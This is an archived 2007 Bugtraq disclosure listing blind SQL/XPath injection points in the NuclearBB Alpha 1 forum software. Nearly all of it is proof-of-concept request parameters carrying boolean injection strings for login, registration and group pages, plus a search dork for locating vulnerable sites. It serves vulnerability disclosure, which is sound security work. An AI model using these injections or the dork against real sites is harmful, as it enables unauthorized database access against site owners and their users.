NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
From: john@xxxxxxxxxxxxxx
Date: 18 Apr 2007 19:16:26 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"


=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xxxxxxx"+and+"1"="0
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx
pass1=xyz@xxxxxxx
pass2=xyz@xxxxxxx
website=xyz@xxxxxxx
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx"+and+"1"="0
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx
pass1=xyz@xxxxxxx
pass2=xyz@xxxxxxx
website=xyz@xxxxxxx
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

username=xyz@xxxxxxx
email=xyz@xxxxxxx+and+1=0
pass1=xyz@xxxxxxx
pass2=xyz@xxxxxxx
website=xyz@xxxxxxx
location=xyz@xxxxxxx
msn=xyz@xxxxxxx
yahoo=xyz@xxxxxxx
aol=xyz@xxxxxxx
icq=xyz@xxxxxxx
signature=xyz@xxxxxxx
coppa_state=over&register_submit=Register


John Martinelli
john@xxxxxxxxxxxxxx
http://john-martinelli.com

April 18th, 2007

Prev by Date: Re: [funsec] Re: [Full-disclosure] A Botted Fortune 500 a Day
Next by Date: ZDI-07-015: Novell Groupwise WebAccess Base64 Decoding Stack Overflow Vulnerability
Previous by thread: Re: [funsec] Re: [Full-disclosure] A Botted Fortune 500 a Day
Next by thread: ZDI-07-015: Novell Groupwise WebAccess Base64 Decoding Stack Overflow Vulnerability
Index(es):
- Date
- Thread